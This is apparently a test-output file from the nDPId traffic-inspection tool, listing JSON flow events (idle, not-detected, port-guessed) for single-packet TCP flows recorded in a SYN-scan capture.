+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2607,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2608,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2608,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":563,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":563,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":563,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":563,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4662,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4662,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4662,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4662,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33354,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2638,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":593,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":593,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1019,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1019,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16993,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1086,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1086,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16993,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 